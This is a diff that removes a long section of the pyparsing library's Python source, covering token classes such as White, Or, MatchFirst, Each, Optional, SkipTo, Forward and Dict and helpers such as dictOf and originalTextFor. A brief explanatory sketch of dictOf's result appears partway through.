- if exact > 0:
- self.maxLen = exact
- self.minLen = exact
-
- self.name = _ustr(self)
- self.errmsg = "Expected " + self.name
- self.mayReturnEmpty = ( self.minLen == 0 )
- self.mayIndexError = False
-
- def parseImpl( self, instring, loc, doActions=True ):
- if instring[loc] in self.notChars:
- raise ParseException(instring, loc, self.errmsg, self)
-
- start = loc
- loc += 1
- notchars = self.notChars
- maxlen = min( start+self.maxLen, len(instring) )
- while loc < maxlen and \
- (instring[loc] not in notchars):
- loc += 1
-
- if loc - start < self.minLen:
- raise ParseException(instring, loc, self.errmsg, self)
-
- return loc, instring[start:loc]
-
- def __str__( self ):
- try:
- return super(CharsNotIn, self).__str__()
- except:
- pass
-
- if self.strRepr is None:
- if len(self.notChars) > 4:
- self.strRepr = "!W:(%s...)" % self.notChars[:4]
- else:
- self.strRepr = "!W:(%s)" % self.notChars
-
- return self.strRepr
-
-class White(Token):
- """Special matching class for matching whitespace. Normally, whitespace is ignored
- by pyparsing grammars. This class is included when some whitespace structures
- are significant. Define with a string containing the whitespace characters to be
- matched; default is C{" \\t\\r\\n"}. Also takes optional C{min}, C{max}, and C{exact} arguments,
- as defined for the C{L{Word}} class."""
- whiteStrs = {
- " " : "",
- "\t": "",
- "\n": "",
- "\r": "",
- "\f": "",
- }
- def __init__(self, ws=" \t\r\n", min=1, max=0, exact=0):
- super(White,self).__init__()
- self.matchWhite = ws
- self.setWhitespaceChars( "".join(c for c in self.whiteChars if c not in self.matchWhite) )
- #~ self.leaveWhitespace()
- self.name = ("".join(White.whiteStrs[c] for c in self.matchWhite))
- self.mayReturnEmpty = True
- self.errmsg = "Expected " + self.name
-
- self.minLen = min
-
- if max > 0:
- self.maxLen = max
- else:
- self.maxLen = _MAX_INT
-
- if exact > 0:
- self.maxLen = exact
- self.minLen = exact
-
- def parseImpl( self, instring, loc, doActions=True ):
- if not(instring[ loc ] in self.matchWhite):
- raise ParseException(instring, loc, self.errmsg, self)
- start = loc
- loc += 1
- maxloc = start + self.maxLen
- maxloc = min( maxloc, len(instring) )
- while loc < maxloc and instring[loc] in self.matchWhite:
- loc += 1
-
- if loc - start < self.minLen:
- raise ParseException(instring, loc, self.errmsg, self)
-
- return loc, instring[start:loc]
-
-
-class _PositionToken(Token):
- def __init__( self ):
- super(_PositionToken,self).__init__()
- self.name=self.__class__.__name__
- self.mayReturnEmpty = True
- self.mayIndexError = False
-
-class GoToColumn(_PositionToken):
- """Token to advance to a specific column of input text; useful for tabular report scraping."""
- def __init__( self, colno ):
- super(GoToColumn,self).__init__()
- self.col = colno
-
- def preParse( self, instring, loc ):
- if col(loc,instring) != self.col:
- instrlen = len(instring)
- if self.ignoreExprs:
- loc = self._skipIgnorables( instring, loc )
- while loc < instrlen and instring[loc].isspace() and col( loc, instring ) != self.col :
- loc += 1
- return loc
-
- def parseImpl( self, instring, loc, doActions=True ):
- thiscol = col( loc, instring )
- if thiscol > self.col:
- raise ParseException( instring, loc, "Text not in expected column", self )
- newloc = loc + self.col - thiscol
- ret = instring[ loc: newloc ]
- return newloc, ret
-
-class LineStart(_PositionToken):
- """Matches if current position is at the beginning of a line within the parse string"""
- def __init__( self ):
- super(LineStart,self).__init__()
- self.setWhitespaceChars( ParserElement.DEFAULT_WHITE_CHARS.replace("\n","") )
- self.errmsg = "Expected start of line"
-
- def preParse( self, instring, loc ):
- preloc = super(LineStart,self).preParse(instring,loc)
- if instring[preloc] == "\n":
- loc += 1
- return loc
-
- def parseImpl( self, instring, loc, doActions=True ):
- if not( loc==0 or
- (loc == self.preParse( instring, 0 )) or
- (instring[loc-1] == "\n") ): #col(loc, instring) != 1:
- raise ParseException(instring, loc, self.errmsg, self)
- return loc, []
-
-class LineEnd(_PositionToken):
- """Matches if current position is at the end of a line within the parse string"""
- def __init__( self ):
- super(LineEnd,self).__init__()
- self.setWhitespaceChars( ParserElement.DEFAULT_WHITE_CHARS.replace("\n","") )
- self.errmsg = "Expected end of line"
-
- def parseImpl( self, instring, loc, doActions=True ):
- if loc<len(instring):
- if instring[loc] == "\n":
- return loc+1, "\n"
- else:
- raise ParseException(instring, loc, self.errmsg, self)
- elif loc == len(instring):
- return loc+1, []
- else:
- raise ParseException(instring, loc, self.errmsg, self)
-
-class StringStart(_PositionToken):
- """Matches if current position is at the beginning of the parse string"""
- def __init__( self ):
- super(StringStart,self).__init__()
- self.errmsg = "Expected start of text"
-
- def parseImpl( self, instring, loc, doActions=True ):
- if loc != 0:
- # see if entire string up to here is just whitespace and ignoreables
- if loc != self.preParse( instring, 0 ):
- raise ParseException(instring, loc, self.errmsg, self)
- return loc, []
-
-class StringEnd(_PositionToken):
- """Matches if current position is at the end of the parse string"""
- def __init__( self ):
- super(StringEnd,self).__init__()
- self.errmsg = "Expected end of text"
-
- def parseImpl( self, instring, loc, doActions=True ):
- if loc < len(instring):
- raise ParseException(instring, loc, self.errmsg, self)
- elif loc == len(instring):
- return loc+1, []
- elif loc > len(instring):
- return loc, []
- else:
- raise ParseException(instring, loc, self.errmsg, self)
-
-class WordStart(_PositionToken):
- """Matches if the current position is at the beginning of a Word, and
- is not preceded by any character in a given set of C{wordChars}
- (default=C{printables}). To emulate the C{\b} behavior of regular expressions,
- use C{WordStart(alphanums)}. C{WordStart} will also match at the beginning of
- the string being parsed, or at the beginning of a line.
- """
- def __init__(self, wordChars = printables):
- super(WordStart,self).__init__()
- self.wordChars = set(wordChars)
- self.errmsg = "Not at the start of a word"
-
- def parseImpl(self, instring, loc, doActions=True ):
- if loc != 0:
- if (instring[loc-1] in self.wordChars or
- instring[loc] not in self.wordChars):
- raise ParseException(instring, loc, self.errmsg, self)
- return loc, []
-
-class WordEnd(_PositionToken):
- """Matches if the current position is at the end of a Word, and
- is not followed by any character in a given set of C{wordChars}
- (default=C{printables}). To emulate the C{\b} behavior of regular expressions,
- use C{WordEnd(alphanums)}. C{WordEnd} will also match at the end of
- the string being parsed, or at the end of a line.
- """
- def __init__(self, wordChars = printables):
- super(WordEnd,self).__init__()
- self.wordChars = set(wordChars)
- self.skipWhitespace = False
- self.errmsg = "Not at the end of a word"
-
- def parseImpl(self, instring, loc, doActions=True ):
- instrlen = len(instring)
- if instrlen>0 and loc<instrlen:
- if (instring[loc] in self.wordChars or
- instring[loc-1] not in self.wordChars):
- raise ParseException(instring, loc, self.errmsg, self)
- return loc, []
-
-
-class Or(ParseExpression):
- """Requires that at least one C{ParseExpression} is found.
- If two expressions match, the expression that matches the longest string will be used.
- May be constructed using the C{'^'} operator.
- """
- def __init__( self, exprs, savelist = False ):
- super(Or,self).__init__(exprs, savelist)
- if self.exprs:
- self.mayReturnEmpty = any(e.mayReturnEmpty for e in self.exprs)
- else:
- self.mayReturnEmpty = True
-
- def parseImpl( self, instring, loc, doActions=True ):
- maxExcLoc = -1
- maxException = None
- maxMatchLoc = -1
- maxMatchExp = None
- for e in self.exprs:
- try:
- loc2 = e.tryParse( instring, loc )
- except ParseException as err:
- if err.loc > maxExcLoc:
- maxException = err
- maxExcLoc = err.loc
- except IndexError:
- if len(instring) > maxExcLoc:
- maxException = ParseException(instring,len(instring),e.errmsg,self)
- maxExcLoc = len(instring)
- else:
- if loc2 > maxMatchLoc:
- maxMatchLoc = loc2
- maxMatchExp = e
-
- if maxMatchLoc < 0:
- if maxException is not None:
- raise maxException
- else:
- raise ParseException(instring, loc, "no defined alternatives to match", self)
-
- return maxMatchExp._parse( instring, loc, doActions )
-
- def __ixor__(self, other ):
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- return self.append( other ) #Or( [ self, other ] )
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- if self.strRepr is None:
- self.strRepr = "{" + " ^ ".join(_ustr(e) for e in self.exprs) + "}"
-
- return self.strRepr
-
- def checkRecursion( self, parseElementList ):
- subRecCheckList = parseElementList[:] + [ self ]
- for e in self.exprs:
- e.checkRecursion( subRecCheckList )
-
-
-class MatchFirst(ParseExpression):
- """Requires that at least one C{ParseExpression} is found.
- If two expressions match, the first one listed is the one that will match.
- May be constructed using the C{'|'} operator.
- """
- def __init__( self, exprs, savelist = False ):
- super(MatchFirst,self).__init__(exprs, savelist)
- if self.exprs:
- self.mayReturnEmpty = any(e.mayReturnEmpty for e in self.exprs)
- else:
- self.mayReturnEmpty = True
-
- def parseImpl( self, instring, loc, doActions=True ):
- maxExcLoc = -1
- maxException = None
- for e in self.exprs:
- try:
- ret = e._parse( instring, loc, doActions )
- return ret
- except ParseException as err:
- if err.loc > maxExcLoc:
- maxException = err
- maxExcLoc = err.loc
- except IndexError:
- if len(instring) > maxExcLoc:
- maxException = ParseException(instring,len(instring),e.errmsg,self)
- maxExcLoc = len(instring)
-
- # only got here if no expression matched, raise exception for match that made it the furthest
- else:
- if maxException is not None:
- raise maxException
- else:
- raise ParseException(instring, loc, "no defined alternatives to match", self)
-
- def __ior__(self, other ):
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass( other )
- return self.append( other ) #MatchFirst( [ self, other ] )
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- if self.strRepr is None:
- self.strRepr = "{" + " | ".join(_ustr(e) for e in self.exprs) + "}"
-
- return self.strRepr
-
- def checkRecursion( self, parseElementList ):
- subRecCheckList = parseElementList[:] + [ self ]
- for e in self.exprs:
- e.checkRecursion( subRecCheckList )
-
-
-class Each(ParseExpression):
- """Requires all given C{ParseExpression}s to be found, but in any order.
- Expressions may be separated by whitespace.
- May be constructed using the C{'&'} operator.
- """
- def __init__( self, exprs, savelist = True ):
- super(Each,self).__init__(exprs, savelist)
- self.mayReturnEmpty = all(e.mayReturnEmpty for e in self.exprs)
- self.skipWhitespace = True
- self.initExprGroups = True
-
- def parseImpl( self, instring, loc, doActions=True ):
- if self.initExprGroups:
- opt1 = [ e.expr for e in self.exprs if isinstance(e,Optional) ]
- opt2 = [ e for e in self.exprs if e.mayReturnEmpty and e not in opt1 ]
- self.optionals = opt1 + opt2
- self.multioptionals = [ e.expr for e in self.exprs if isinstance(e,ZeroOrMore) ]
- self.multirequired = [ e.expr for e in self.exprs if isinstance(e,OneOrMore) ]
- self.required = [ e for e in self.exprs if not isinstance(e,(Optional,ZeroOrMore,OneOrMore)) ]
- self.required += self.multirequired
- self.initExprGroups = False
- tmpLoc = loc
- tmpReqd = self.required[:]
- tmpOpt = self.optionals[:]
- matchOrder = []
-
- keepMatching = True
- while keepMatching:
- tmpExprs = tmpReqd + tmpOpt + self.multioptionals + self.multirequired
- failed = []
- for e in tmpExprs:
- try:
- tmpLoc = e.tryParse( instring, tmpLoc )
- except ParseException:
- failed.append(e)
- else:
- matchOrder.append(e)
- if e in tmpReqd:
- tmpReqd.remove(e)
- elif e in tmpOpt:
- tmpOpt.remove(e)
- if len(failed) == len(tmpExprs):
- keepMatching = False
-
- if tmpReqd:
- missing = ", ".join(_ustr(e) for e in tmpReqd)
- raise ParseException(instring,loc,"Missing one or more required elements (%s)" % missing )
-
- # add any unmatched Optionals, in case they have default values defined
- matchOrder += [e for e in self.exprs if isinstance(e,Optional) and e.expr in tmpOpt]
-
- resultlist = []
- for e in matchOrder:
- loc,results = e._parse(instring,loc,doActions)
- resultlist.append(results)
-
- finalResults = ParseResults([])
- for r in resultlist:
- dups = {}
- for k in r.keys():
- if k in finalResults:
- tmp = ParseResults(finalResults[k])
- tmp += ParseResults(r[k])
- dups[k] = tmp
- finalResults += ParseResults(r)
- for k,v in dups.items():
- finalResults[k] = v
- return loc, finalResults
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- if self.strRepr is None:
- self.strRepr = "{" + " & ".join(_ustr(e) for e in self.exprs) + "}"
-
- return self.strRepr
-
- def checkRecursion( self, parseElementList ):
- subRecCheckList = parseElementList[:] + [ self ]
- for e in self.exprs:
- e.checkRecursion( subRecCheckList )
-
-
-class ParseElementEnhance(ParserElement):
- """Abstract subclass of C{ParserElement}, for combining and post-processing parsed tokens."""
- def __init__( self, expr, savelist=False ):
- super(ParseElementEnhance,self).__init__(savelist)
- if isinstance( expr, basestring ):
- expr = Literal(expr)
- self.expr = expr
- self.strRepr = None
- if expr is not None:
- self.mayIndexError = expr.mayIndexError
- self.mayReturnEmpty = expr.mayReturnEmpty
- self.setWhitespaceChars( expr.whiteChars )
- self.skipWhitespace = expr.skipWhitespace
- self.saveAsList = expr.saveAsList
- self.callPreparse = expr.callPreparse
- self.ignoreExprs.extend(expr.ignoreExprs)
-
- def parseImpl( self, instring, loc, doActions=True ):
- if self.expr is not None:
- return self.expr._parse( instring, loc, doActions, callPreParse=False )
- else:
- raise ParseException("",loc,self.errmsg,self)
-
- def leaveWhitespace( self ):
- self.skipWhitespace = False
- self.expr = self.expr.copy()
- if self.expr is not None:
- self.expr.leaveWhitespace()
- return self
-
- def ignore( self, other ):
- if isinstance( other, Suppress ):
- if other not in self.ignoreExprs:
- super( ParseElementEnhance, self).ignore( other )
- if self.expr is not None:
- self.expr.ignore( self.ignoreExprs[-1] )
- else:
- super( ParseElementEnhance, self).ignore( other )
- if self.expr is not None:
- self.expr.ignore( self.ignoreExprs[-1] )
- return self
-
- def streamline( self ):
- super(ParseElementEnhance,self).streamline()
- if self.expr is not None:
- self.expr.streamline()
- return self
-
- def checkRecursion( self, parseElementList ):
- if self in parseElementList:
- raise RecursiveGrammarException( parseElementList+[self] )
- subRecCheckList = parseElementList[:] + [ self ]
- if self.expr is not None:
- self.expr.checkRecursion( subRecCheckList )
-
- def validate( self, validateTrace=[] ):
- tmp = validateTrace[:]+[self]
- if self.expr is not None:
- self.expr.validate(tmp)
- self.checkRecursion( [] )
-
- def __str__( self ):
- try:
- return super(ParseElementEnhance,self).__str__()
- except:
- pass
-
- if self.strRepr is None and self.expr is not None:
- self.strRepr = "%s:(%s)" % ( self.__class__.__name__, _ustr(self.expr) )
- return self.strRepr
-
-
-class FollowedBy(ParseElementEnhance):
- """Lookahead matching of the given parse expression. C{FollowedBy}
- does *not* advance the parsing position within the input string, it only
- verifies that the specified parse expression matches at the current
- position. C{FollowedBy} always returns a null token list."""
- def __init__( self, expr ):
- super(FollowedBy,self).__init__(expr)
- self.mayReturnEmpty = True
-
- def parseImpl( self, instring, loc, doActions=True ):
- self.expr.tryParse( instring, loc )
- return loc, []
-
-
-class NotAny(ParseElementEnhance):
- """Lookahead to disallow matching with the given parse expression. C{NotAny}
- does *not* advance the parsing position within the input string, it only
- verifies that the specified parse expression does *not* match at the current
- position. Also, C{NotAny} does *not* skip over leading whitespace. C{NotAny}
- always returns a null token list. May be constructed using the '~' operator."""
- def __init__( self, expr ):
- super(NotAny,self).__init__(expr)
- #~ self.leaveWhitespace()
- self.skipWhitespace = False # do NOT use self.leaveWhitespace(), don't want to propagate to exprs
- self.mayReturnEmpty = True
- self.errmsg = "Found unwanted token, "+_ustr(self.expr)
-
- def parseImpl( self, instring, loc, doActions=True ):
- try:
- self.expr.tryParse( instring, loc )
- except (ParseException,IndexError):
- pass
- else:
- raise ParseException(instring, loc, self.errmsg, self)
- return loc, []
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- if self.strRepr is None:
- self.strRepr = "~{" + _ustr(self.expr) + "}"
-
- return self.strRepr
-
-
-class ZeroOrMore(ParseElementEnhance):
- """Optional repetition of zero or more of the given expression."""
- def __init__( self, expr ):
- super(ZeroOrMore,self).__init__(expr)
- self.mayReturnEmpty = True
-
- def parseImpl( self, instring, loc, doActions=True ):
- tokens = []
- try:
- loc, tokens = self.expr._parse( instring, loc, doActions, callPreParse=False )
- hasIgnoreExprs = ( len(self.ignoreExprs) > 0 )
- while 1:
- if hasIgnoreExprs:
- preloc = self._skipIgnorables( instring, loc )
- else:
- preloc = loc
- loc, tmptokens = self.expr._parse( instring, preloc, doActions )
- if tmptokens or tmptokens.haskeys():
- tokens += tmptokens
- except (ParseException,IndexError):
- pass
-
- return loc, tokens
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- if self.strRepr is None:
- self.strRepr = "[" + _ustr(self.expr) + "]..."
-
- return self.strRepr
-
- def setResultsName( self, name, listAllMatches=False ):
- ret = super(ZeroOrMore,self).setResultsName(name,listAllMatches)
- ret.saveAsList = True
- return ret
-
-
-class OneOrMore(ParseElementEnhance):
- """Repetition of one or more of the given expression."""
- def parseImpl( self, instring, loc, doActions=True ):
- # must be at least one
- loc, tokens = self.expr._parse( instring, loc, doActions, callPreParse=False )
- try:
- hasIgnoreExprs = ( len(self.ignoreExprs) > 0 )
- while 1:
- if hasIgnoreExprs:
- preloc = self._skipIgnorables( instring, loc )
- else:
- preloc = loc
- loc, tmptokens = self.expr._parse( instring, preloc, doActions )
- if tmptokens or tmptokens.haskeys():
- tokens += tmptokens
- except (ParseException,IndexError):
- pass
-
- return loc, tokens
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- if self.strRepr is None:
- self.strRepr = "{" + _ustr(self.expr) + "}..."
-
- return self.strRepr
-
- def setResultsName( self, name, listAllMatches=False ):
- ret = super(OneOrMore,self).setResultsName(name,listAllMatches)
- ret.saveAsList = True
- return ret
-
-class _NullToken(object):
- def __bool__(self):
- return False
- __nonzero__ = __bool__
- def __str__(self):
- return ""
-
-_optionalNotMatched = _NullToken()
-class Optional(ParseElementEnhance):
- """Optional matching of the given expression.
- A default return string can also be specified, if the optional expression
- is not found.
- """
- def __init__( self, expr, default=_optionalNotMatched ):
- super(Optional,self).__init__( expr, savelist=False )
- self.defaultValue = default
- self.mayReturnEmpty = True
-
- def parseImpl( self, instring, loc, doActions=True ):
- try:
- loc, tokens = self.expr._parse( instring, loc, doActions, callPreParse=False )
- except (ParseException,IndexError):
- if self.defaultValue is not _optionalNotMatched:
- if self.expr.resultsName:
- tokens = ParseResults([ self.defaultValue ])
- tokens[self.expr.resultsName] = self.defaultValue
- else:
- tokens = [ self.defaultValue ]
- else:
- tokens = []
- return loc, tokens
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- if self.strRepr is None:
- self.strRepr = "[" + _ustr(self.expr) + "]"
-
- return self.strRepr
-
-
-class SkipTo(ParseElementEnhance):
- """Token for skipping over all undefined text until the matched expression is found.
- If C{include} is set to true, the matched expression is also parsed (the skipped text
- and matched expression are returned as a 2-element list). The C{ignore}
- argument is used to define grammars (typically quoted strings and comments) that
- might contain false matches.
- """
- def __init__( self, other, include=False, ignore=None, failOn=None ):
- super( SkipTo, self ).__init__( other )
- self.ignoreExpr = ignore
- self.mayReturnEmpty = True
- self.mayIndexError = False
- self.includeMatch = include
- self.asList = False
- if failOn is not None and isinstance(failOn, basestring):
- self.failOn = Literal(failOn)
- else:
- self.failOn = failOn
- self.errmsg = "No match found for "+_ustr(self.expr)
-
- def parseImpl( self, instring, loc, doActions=True ):
- startLoc = loc
- instrlen = len(instring)
- expr = self.expr
- failParse = False
- while loc <= instrlen:
- try:
- if self.failOn:
- try:
- self.failOn.tryParse(instring, loc)
- except ParseBaseException:
- pass
- else:
- failParse = True
- raise ParseException(instring, loc, "Found expression " + str(self.failOn))
- failParse = False
- if self.ignoreExpr is not None:
- while 1:
- try:
- loc = self.ignoreExpr.tryParse(instring,loc)
- # print("found ignoreExpr, advance to", loc)
- except ParseBaseException:
- break
- expr._parse( instring, loc, doActions=False, callPreParse=False )
- skipText = instring[startLoc:loc]
- if self.includeMatch:
- loc,mat = expr._parse(instring,loc,doActions,callPreParse=False)
- if mat:
- skipRes = ParseResults( skipText )
- skipRes += mat
- return loc, [ skipRes ]
- else:
- return loc, [ skipText ]
- else:
- return loc, [ skipText ]
- except (ParseException,IndexError):
- if failParse:
- raise
- else:
- loc += 1
- raise ParseException(instring, loc, self.errmsg, self)
-
-class Forward(ParseElementEnhance):
- """Forward declaration of an expression to be defined later -
- used for recursive grammars, such as algebraic infix notation.
- When the expression is known, it is assigned to the C{Forward} variable using the '<<' operator.
-
- Note: take care when assigning to C{Forward} not to overlook precedence of operators.
- Specifically, '|' has a lower precedence than '<<', so that::
- fwdExpr << a | b | c
- will actually be evaluated as::
- (fwdExpr << a) | b | c
- thereby leaving b and c out as parseable alternatives. It is recommended that you
- explicitly group the values inserted into the C{Forward}::
- fwdExpr << (a | b | c)
- Converting to use the '<<=' operator instead will avoid this problem.
- """
- def __init__( self, other=None ):
- super(Forward,self).__init__( other, savelist=False )
-
- def __lshift__( self, other ):
- if isinstance( other, basestring ):
- other = ParserElement.literalStringClass(other)
- self.expr = other
- self.mayReturnEmpty = other.mayReturnEmpty
- self.strRepr = None
- self.mayIndexError = self.expr.mayIndexError
- self.mayReturnEmpty = self.expr.mayReturnEmpty
- self.setWhitespaceChars( self.expr.whiteChars )
- self.skipWhitespace = self.expr.skipWhitespace
- self.saveAsList = self.expr.saveAsList
- self.ignoreExprs.extend(self.expr.ignoreExprs)
- return self
-
- def __ilshift__(self, other):
- return self << other
-
- def leaveWhitespace( self ):
- self.skipWhitespace = False
- return self
-
- def streamline( self ):
- if not self.streamlined:
- self.streamlined = True
- if self.expr is not None:
- self.expr.streamline()
- return self
-
- def validate( self, validateTrace=[] ):
- if self not in validateTrace:
- tmp = validateTrace[:]+[self]
- if self.expr is not None:
- self.expr.validate(tmp)
- self.checkRecursion([])
-
- def __str__( self ):
- if hasattr(self,"name"):
- return self.name
-
- self._revertClass = self.__class__
- self.__class__ = _ForwardNoRecurse
- try:
- if self.expr is not None:
- retString = _ustr(self.expr)
- else:
- retString = "None"
- finally:
- self.__class__ = self._revertClass
- return self.__class__.__name__ + ": " + retString
-
- def copy(self):
- if self.expr is not None:
- return super(Forward,self).copy()
- else:
- ret = Forward()
- ret <<= self
- return ret
-
-class _ForwardNoRecurse(Forward):
- def __str__( self ):
- return "..."
-
-class TokenConverter(ParseElementEnhance):
- """Abstract subclass of C{ParseExpression}, for converting parsed results."""
- def __init__( self, expr, savelist=False ):
- super(TokenConverter,self).__init__( expr )#, savelist )
- self.saveAsList = False
-
-class Upcase(TokenConverter):
- """Converter to upper case all matching tokens."""
- def __init__(self, *args):
- super(Upcase,self).__init__(*args)
- warnings.warn("Upcase class is deprecated, use upcaseTokens parse action instead",
- DeprecationWarning,stacklevel=2)
-
- def postParse( self, instring, loc, tokenlist ):
- return list(map( str.upper, tokenlist ))
-
-
-class Combine(TokenConverter):
- """Converter to concatenate all matching tokens to a single string.
- By default, the matching patterns must also be contiguous in the input string;
- this can be disabled by specifying C{'adjacent=False'} in the constructor.
- """
- def __init__( self, expr, joinString="", adjacent=True ):
- super(Combine,self).__init__( expr )
- # suppress whitespace-stripping in contained parse expressions, but re-enable it on the Combine itself
- if adjacent:
- self.leaveWhitespace()
- self.adjacent = adjacent
- self.skipWhitespace = True
- self.joinString = joinString
- self.callPreparse = True
-
- def ignore( self, other ):
- if self.adjacent:
- ParserElement.ignore(self, other)
- else:
- super( Combine, self).ignore( other )
- return self
-
- def postParse( self, instring, loc, tokenlist ):
- retToks = tokenlist.copy()
- del retToks[:]
- retToks += ParseResults([ "".join(tokenlist._asStringList(self.joinString)) ], modal=self.modalResults)
-
- if self.resultsName and retToks.haskeys():
- return [ retToks ]
- else:
- return retToks
-
-class Group(TokenConverter):
- """Converter to return the matched tokens as a list - useful for returning tokens of C{L{ZeroOrMore}} and C{L{OneOrMore}} expressions."""
- def __init__( self, expr ):
- super(Group,self).__init__( expr )
- self.saveAsList = True
-
- def postParse( self, instring, loc, tokenlist ):
- return [ tokenlist ]
-
-class Dict(TokenConverter):
- """Converter to return a repetitive expression as a list, but also as a dictionary.
- Each element can also be referenced using the first token in the expression as its key.
- Useful for tabular report scraping when the first column can be used as a item key.
- """
- def __init__( self, expr ):
- super(Dict,self).__init__( expr )
- self.saveAsList = True
-
- def postParse( self, instring, loc, tokenlist ):
- for i,tok in enumerate(tokenlist):
- if len(tok) == 0:
- continue
- ikey = tok[0]
- if isinstance(ikey,int):
- ikey = _ustr(tok[0]).strip()
- if len(tok)==1:
- tokenlist[ikey] = _ParseResultsWithOffset("",i)
- elif len(tok)==2 and not isinstance(tok[1],ParseResults):
- tokenlist[ikey] = _ParseResultsWithOffset(tok[1],i)
- else:
- dictvalue = tok.copy() #ParseResults(i)
- del dictvalue[0]
- if len(dictvalue)!= 1 or (isinstance(dictvalue,ParseResults) and dictvalue.haskeys()):
- tokenlist[ikey] = _ParseResultsWithOffset(dictvalue,i)
- else:
- tokenlist[ikey] = _ParseResultsWithOffset(dictvalue[0],i)
-
- if self.resultsName:
- return [ tokenlist ]
- else:
- return tokenlist
-
-
-class Suppress(TokenConverter):
- """Converter for ignoring the results of a parsed expression."""
- def postParse( self, instring, loc, tokenlist ):
- return []
-
- def suppress( self ):
- return self
-
-
-class OnlyOnce(object):
- """Wrapper for parse actions, to ensure they are only called once."""
- def __init__(self, methodCall):
- self.callable = _trim_arity(methodCall)
- self.called = False
- def __call__(self,s,l,t):
- if not self.called:
- results = self.callable(s,l,t)
- self.called = True
- return results
- raise ParseException(s,l,"")
- def reset(self):
- self.called = False
-
-def traceParseAction(f):
- """Decorator for debugging parse actions."""
- f = _trim_arity(f)
- def z(*paArgs):
- thisFunc = f.func_name
- s,l,t = paArgs[-3:]
- if len(paArgs)>3:
- thisFunc = paArgs[0].__class__.__name__ + '.' + thisFunc
- sys.stderr.write( ">>entering %s(line: '%s', %d, %s)\n" % (thisFunc,line(l,s),l,t) )
- try:
- ret = f(*paArgs)
- except Exception as exc:
- sys.stderr.write( "<<leaving %s (exception: %s)\n" % (thisFunc,exc) )
- raise
- sys.stderr.write( "<<leaving %s (ret: %r)\n" % (thisFunc,ret) )
- return ret
- return z
-
- if not caseless and useRegex:
- #~ print (strs,"->", "|".join( [ _escapeRegexChars(sym) for sym in symbols] ))
- try:
- if len(symbols)==len("".join(symbols)):
- return Regex( "[%s]" % "".join(_escapeRegexRangeChars(sym) for sym in symbols) )
- else:
- return Regex( "|".join(re.escape(sym) for sym in symbols) )
- except:
- warnings.warn("Exception creating Regex for oneOf, building MatchFirst",
- SyntaxWarning, stacklevel=2)
-
-
- # last resort, just use MatchFirst
- return MatchFirst( [ parseElementClass(sym) for sym in symbols ] )
-
-def dictOf( key, value ):
- """Helper to easily and clearly define a dictionary by specifying the respective patterns
- for the key and value. Takes care of defining the C{L{Dict}}, C{L{ZeroOrMore}}, and C{L{Group}} tokens
- in the proper order. The key pattern can include delimiting markers or punctuation,
- as long as they are suppressed, thereby leaving the significant key text. The value
- pattern can include named results, so that the C{Dict} results can include named token
- fields.
- """
- return Dict( ZeroOrMore( Group ( key + value ) ) )
-
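For reference, the dual list/mapping result that `dictOf` builds can be mimicked in plain Python. This is a hypothetical stdlib-only sketch (not pyparsing's implementation); `pairs` stands in for the `(key + value)` groups that `dictOf` would parse from text:

```python
def dict_of(pairs):
    # Hypothetical sketch, plain Python only: mimic the dual result shape
    # that dictOf produces. `pairs` stands in for the (key + value) groups
    # parsed from text.
    as_list = [list(p) for p in pairs]      # positional access, like a token list
    as_map = {p[0]: p[1] for p in pairs}    # keyed access, like Dict
    return as_list, as_map

rows, index = dict_of([("shape", "SQUARE"), ("color", "BLACK"), ("posn", "upper left")])
print(index["color"])   # BLACK
print(rows[0])          # ['shape', 'SQUARE']
```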
-def originalTextFor(expr, asString=True):
- """Helper to return the original, untokenized text for a given expression. Useful to
- restore the parsed fields of an HTML start tag into the raw tag text itself, or to
- revert separate tokens with intervening whitespace back to the original matching
- input text. Simpler to use than the parse action C{L{keepOriginalText}}, and does not
- require the inspect module to chase up the call stack. By default, returns a
- string containing the original parsed text.
-
- If the optional C{asString} argument is passed as C{False}, then the return value is a
- C{L{ParseResults}} containing any results names that were originally matched, and a
- single token containing the original matched text from the input string. So if
- the expression passed to C{L{originalTextFor}} contains expressions with defined
- results names, you must set C{asString} to C{False} if you want to preserve those
- results name values."""
- locMarker = Empty().setParseAction(lambda s,loc,t: loc)
- endlocMarker = locMarker.copy()
- endlocMarker.callPreparse = False
- matchExpr = locMarker("_original_start") + expr + endlocMarker("_original_end")
- if asString:
- extractText = lambda s,l,t: s[t._original_start:t._original_end]
- else:
- def extractText(s,l,t):
- del t[:]
- t.insert(0, s[t._original_start:t._original_end])
- del t["_original_start"]
- del t["_original_end"]
- matchExpr.setParseAction(extractText)
- return matchExpr
-
-def ungroup(expr):
- """Helper to undo pyparsing's default grouping of And expressions, even
- if all but one are non-empty."""
- return TokenConverter(expr).setParseAction(lambda t:t[0])
-
-def locatedExpr(expr):
- """Helper to decorate a returned token with its starting and ending locations in the input string.
- This helper adds the following results names:
- - locn_start = location where matched expression begins
- - locn_end = location where matched expression ends
- - value = the actual parsed results
-
- Be careful if the input text contains C{<TAB>} characters, you may want to call
- C{L{ParserElement.parseWithTabs}}
- """
- locator = Empty().setParseAction(lambda s,l,t: l)
- return Group(locator("locn_start") + expr("value") + locator.copy().leaveWhitespace()("locn_end"))
-
-
-# convenience constants for positional expressions
-empty = Empty().setName("empty")
-lineStart = LineStart().setName("lineStart")
-lineEnd = LineEnd().setName("lineEnd")
-stringStart = StringStart().setName("stringStart")
-stringEnd = StringEnd().setName("stringEnd")
-
-_escapedPunc = Word( _bslash, r"\[]-*.$+^?()~ ", exact=2 ).setParseAction(lambda s,l,t:t[0][1])
-_escapedHexChar = Regex(r"\\0?[xX][0-9a-fA-F]+").setParseAction(lambda s,l,t:unichr(int(t[0].lstrip(r'\0x'),16)))
-_escapedOctChar = Regex(r"\\0[0-7]+").setParseAction(lambda s,l,t:unichr(int(t[0][1:],8)))
-_singleChar = _escapedPunc | _escapedHexChar | _escapedOctChar | Word(printables, excludeChars=r'\]', exact=1)
-_charRange = Group(_singleChar + Suppress("-") + _singleChar)
-_reBracketExpr = Literal("[") + Optional("^").setResultsName("negate") + Group( OneOrMore( _charRange | _singleChar ) ).setResultsName("body") + "]"
-
